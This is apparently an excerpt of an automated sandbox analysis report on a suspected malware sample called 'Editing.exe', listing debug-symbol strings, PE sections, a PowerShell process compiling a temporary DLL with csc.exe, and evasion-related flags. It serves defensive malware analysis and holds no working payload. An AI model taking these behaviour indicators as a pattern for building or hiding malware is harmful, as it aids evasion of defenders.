Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Primitives\Release\net8.0\System.Runtime.Serialization.Primitives.pdb source: Editing.exe, 00000000.00000002.3215131916.00000284D0141000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3215153387.00000284D0150000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Net.Security.ni.pdb source: Editing.exe, 00000000.00000002.3214222078.00000284CFBD1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214169569.00000284CFB80000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Console\Release\net8.0-windows\System.Console.pdb source: Editing.exe, 00000000.00000002.3212975104.00000284CD0C0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212597286.00000284CCB11000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Security.Principal.Windows.ni.pdb source: Editing.exe, 00000000.00000002.3212344387.00000284CCA71000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212307083.00000284CCA50000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.NonGeneric\Release\net8.0\System.Collections.NonGeneric.pdb source: Editing.exe, 00000000.00000002.3216283839.00000284D0A30000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3216261389.00000284D0A21000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Overlapped\Release\net8.0\System.Threading.Overlapped.pdbSHA256t source: Editing.exe, 00000000.00000002.3214531779.00000284CFE11000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214552955.00000284CFE20000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\dlls\mscordac\mscordaccore.pdb source: Editing.exe, Editing.exe, 00000000.00000002.3236670998.00007FF647018000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Concurrent\Release\net8.0\System.Collections.Concurrent.pdb source: Editing.exe, 00000000.00000002.3214300596.00000284CFC41000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214325112.00000284CFC60000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Security\Release\net8.0-windows\System.Net.Security.pdbSHA256 source: Editing.exe, 00000000.00000002.3214222078.00000284CFBD1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214169569.00000284CFB80000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Registry\Release\net8.0-windows\Microsoft.Win32.Registry.pdb source: Editing.exe, 00000000.00000002.3215940910.00000284D08D0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3211154010.0000024437CD1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.NameResolution\Release\net8.0-windows\System.Net.NameResolution.pdb source: Editing.exe, 00000000.00000002.3214735866.00000284CFED0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3214672966.00000284CFEB1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.DiagnosticSource\Release\net8.0\System.Diagnostics.DiagnosticSource.pdb source: Editing.exe, 00000000.00000002.3214089010.00000284CFB20000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3214140885.00000284CFB51000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq\Release\net8.0\System.Linq.pdb source: Editing.exe, 00000000.00000002.3215281217.00000284D01B1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3215234136.00000284D0180000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Collections.NonGeneric.ni.pdb source: Editing.exe, 00000000.00000002.3216283839.00000284D0A30000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3216261389.00000284D0A21000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Process\Release\net8.0-windows\System.Diagnostics.Process.pdb source: Editing.exe, 00000000.00000002.3212183576.00000284CC9D0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212225709.00000284CCA01000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Linq.ni.pdb source: Editing.exe, 00000000.00000002.3215281217.00000284D01B1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3215234136.00000284D0180000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Overlapped\Release\net8.0\System.Threading.Overlapped.pdb source: Editing.exe, 00000000.00000002.3214531779.00000284CFE11000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214552955.00000284CFE20000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Tracing\Release\net8.0\System.Diagnostics.Tracing.pdb source: Editing.exe, 00000000.00000002.3213935450.00000284CFAE0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3213770399.00000284CF971000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Memory.ni.pdb source: Editing.exe, 00000000.00000002.3216145339.00000284D09D0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212913296.00000284CCFC8000.00000004.00000020.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3216549510.00000284D0E41000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Primitives\Release\net8.0\Microsoft.Win32.Primitives.pdb source: Editing.exe, 00000000.00000002.3214493572.00000284CFE00000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3210892163.00000244364D1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Primitives\Release\net8.0\System.Reflection.Primitives.pdb source: Editing.exe, 00000000.00000002.3215920817.00000284D08B0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3215900196.00000284D08A1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Private.DataContractSerialization.ni.pdb source: Editing.exe, 00000000.00000002.3215019846.00000284D0051000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214933418.00000284CFF70000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.ThreadPool\Release\net8.0\System.Threading.ThreadPool.pdb source: Editing.exe, 00000000.00000002.3214715169.00000284CFEC1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214755813.00000284CFEE0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Security\Release\net8.0-windows\System.Net.Security.pdb source: Editing.exe, 00000000.00000002.3214222078.00000284CFBD1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214169569.00000284CFB80000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Collections.ni.pdb source: Editing.exe, 00000000.00000002.3214846387.00000284CFF31000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214801607.00000284CFF10000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http\Release\net8.0-windows\System.Net.Http.pdbSHA256 source: Editing.exe, 00000000.00000002.3213884907.00000284CFA31000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3213789653.00000284CF980000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Private.CoreLib.ni.pdb source: Editing.exe, 00000000.00000002.3213036029.00000284CD121000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212619407.00000284CCB30000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Management/Release/net8.0-windows/System.Management.pdbSHA256 source: Editing.exe, 00000000.00000002.3215961512.00000284D08F0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3216014096.00000284D0941000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Loader\Release\net8.0\System.Runtime.Loader.pdb source: Editing.exe, 00000000.00000002.3214912074.00000284CFF61000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3215091691.00000284D0130000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Private.Uri\Release\net8.0\System.Private.Uri.pdb source: Editing.exe, 00000000.00000002.3214257265.00000284CFC20000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3214057906.00000284CFB01000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Primitives\Release\net8.0-windows\System.Net.Primitives.pdb source: Editing.exe, 00000000.00000002.3213703627.00000284CF931000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3213728975.00000284CF950000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Security.Cryptography.ni.pdb source: Editing.exe, 00000000.00000002.3214347772.00000284CFC80000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3214432901.00000284CFD41000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Private.Xml.ni.pdb source: Editing.exe, 00000000.00000002.3215619881.00000284D0541000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3215366959.00000284D0240000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Collections.Specialized.ni.pdb source: Editing.exe, 00000000.00000002.3216124709.00000284D09C1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3216165832.00000284D09E0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Xml.ReaderWriter\Release\net8.0\System.Xml.ReaderWriter.pdb source: Editing.exe, 00000000.00000002.3213973895.00000284CFAF1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214871433.00000284CFF50000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Emit.ILGeneration\Release\net8.0\System.Reflection.Emit.ILGeneration.pdb source: Editing.exe, 00000000.00000002.3215193208.00000284D0161000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3215214561.00000284D0170000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Runtime.Serialization.Primitives.ni.pdb source: Editing.exe, 00000000.00000002.3215131916.00000284D0141000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3215153387.00000284D0150000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Runtime.InteropServices.ni.pdb source: Editing.exe, 00000000.00000002.3212402002.00000284CCAA1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212420646.00000284CCAB0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq\Release\net8.0\System.Linq.pdbSHA256R source: Editing.exe, 00000000.00000002.3215281217.00000284D01B1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3215234136.00000284D0180000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading\Release\net8.0\System.Threading.pdb source: Editing.exe, 00000000.00000002.3212506695.00000284CCAE1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212526014.00000284CCAF0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Private.DataContractSerialization/Release/net8.0/System.Private.DataContractSerialization.pdb source: Editing.exe, 00000000.00000002.3215019846.00000284D0051000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214933418.00000284CFF70000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net8.0\System.Threading.Thread.pdbSHA256 source: Editing.exe, 00000000.00000002.3216088459.00000284D09B0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3216068311.00000284D09A1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Text.RegularExpressions.ni.pdb source: Editing.exe, 00000000.00000002.3215328342.00000284D01E1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3215842835.00000284D0840000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Security.Claims.ni.pdb source: Editing.exe, 00000000.00000002.3212365601.00000284CCA90000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212288969.00000284CCA41000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\Corehost.Static\singlefilehost.pdb source: Editing.exe
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http\Release\net8.0-windows\System.Net.Http.pdb source: Editing.exe, 00000000.00000002.3213884907.00000284CFA31000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3213789653.00000284CF980000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\System.Private.CoreLib\x64\Release\System.Private.CoreLib.pdb source: Editing.exe, 00000000.00000002.3213036029.00000284CD121000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212619407.00000284CCB30000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Primitives\Release\net8.0\System.Runtime.Serialization.Primitives.pdbSHA256 source: Editing.exe, 00000000.00000002.3215131916.00000284D0141000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3215153387.00000284D0150000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Memory\Release\net8.0\System.Memory.pdb source: Editing.exe, 00000000.00000002.3216145339.00000284D09D0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212913296.00000284CCFC8000.00000004.00000020.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3216549510.00000284D0E41000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Emit.ILGeneration\Release\net8.0\System.Reflection.Emit.ILGeneration.pdbSHA256 source: Editing.exe, 00000000.00000002.3215193208.00000284D0161000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3215214561.00000284D0170000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.Primitives\Release\net8.0\System.ComponentModel.Primitives.pdb source: Editing.exe, 00000000.00000002.3212165209.00000284CC9C1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212254148.00000284CCA30000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.ServicePoint\Release\net8.0\System.Net.ServicePoint.pdbSHA256 source: Editing.exe, 00000000.00000002.3216224267.00000284D0A10000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3216204347.00000284D0A01000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Net.NameResolution.ni.pdb source: Editing.exe, 00000000.00000002.3214735866.00000284CFED0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3214672966.00000284CFEB1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Console.ni.pdb source: Editing.exe, 00000000.00000002.3212975104.00000284CD0C0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212597286.00000284CCB11000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Sockets\Release\net8.0-windows\System.Net.Sockets.pdb source: Editing.exe, 00000000.00000002.3214572685.00000284CFE30000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3214620254.00000284CFE71000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Claims\Release\net8.0\System.Security.Claims.pdb source: Editing.exe, 00000000.00000002.3212365601.00000284CCA90000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212288969.00000284CCA41000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Diagnostics.DiagnosticSource.ni.pdb source: Editing.exe, 00000000.00000002.3214089010.00000284CFB20000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3214140885.00000284CFB51000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Net.Http.ni.pdb source: Editing.exe, 00000000.00000002.3213884907.00000284CFA31000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3213789653.00000284CF980000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Threading.ni.pdb source: Editing.exe, 00000000.00000002.3212506695.00000284CCAE1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212526014.00000284CCAF0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime\Release\net8.0\System.Runtime.pdb source: Editing.exe, 00000000.00000002.3211317727.0000024437D40000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3211294592.0000024437D31000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\fri53hgi\fri53hgi.pdb source: powershell.exe, 00000004.00000002.2191077266.0000020A63B94000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.InteropServices\Release\net8.0\System.Runtime.InteropServices.pdb source: Editing.exe, 00000000.00000002.3212402002.00000284CCAA1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212420646.00000284CCAB0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Net.ServicePoint.ni.pdb source: Editing.exe, 00000000.00000002.3216224267.00000284D0A10000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3216204347.00000284D0A01000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Specialized\Release\net8.0\System.Collections.Specialized.pdb source: Editing.exe, 00000000.00000002.3216124709.00000284D09C1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3216165832.00000284D09E0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.ServicePoint\Release\net8.0\System.Net.ServicePoint.pdb source: Editing.exe, 00000000.00000002.3216224267.00000284D0A10000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3216204347.00000284D0A01000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.RegularExpressions\Release\net8.0\System.Text.RegularExpressions.pdb source: Editing.exe, 00000000.00000002.3215328342.00000284D01E1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3215842835.00000284D0840000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Principal.Windows\Release\net8.0-windows\System.Security.Principal.Windows.pdb source: Editing.exe, 00000000.00000002.3212344387.00000284CCA71000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212307083.00000284CCA50000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.ThreadPool\Release\net8.0\System.Threading.ThreadPool.pdbSHA2560 source: Editing.exe, 00000000.00000002.3214715169.00000284CFEC1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214755813.00000284CFEE0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Net.Primitives.ni.pdb source: Editing.exe, 00000000.00000002.3213703627.00000284CF931000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3213728975.00000284CF950000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Management/Release/net8.0-windows/System.Management.pdb source: Editing.exe, 00000000.00000002.3215961512.00000284D08F0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3216014096.00000284D0941000.00000020.00001000.00020000.00000000.sdmp
Source: Editing.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Editing.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Editing.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Editing.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Editing.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fri53hgi\fri53hgi.cmdline"
Source: Editing.exe Static PE information: section name: .CLR_UEF
Source: Editing.exe Static PE information: section name: .didat
Source: Editing.exe Static PE information: section name: Section
Source: Editing.exe Static PE information: section name: _RDATA
Source: C:\Users\user\Desktop\ Editing.exe Code function: 0_2_00007FF5E72154CC push ebp; ret 0_2_00007FF5E72154D8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD342BFC75 pushad ; retf 2_2_00007FFD342BFC77
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD342BD2A5 pushad ; iretd 2_2_00007FFD342BD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD343D00BD pushad ; iretd 2_2_00007FFD343D00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD344A2316 push 8B485F92h; iretd 2_2_00007FFD344A231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD344A5F18 pushad ; ret 2_2_00007FFD344A5F19
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD343B00BD pushad ; iretd 4_2_00007FFD343B00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD343B1A69 push ds; retf 4_2_00007FFD343B1A6A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD343B1049 pushad ; retf 4_2_00007FFD343B105A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD343B105B pushad ; retf 4_2_00007FFD343B105A
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\fri53hgi\fri53hgi.dll

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\ Editing.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
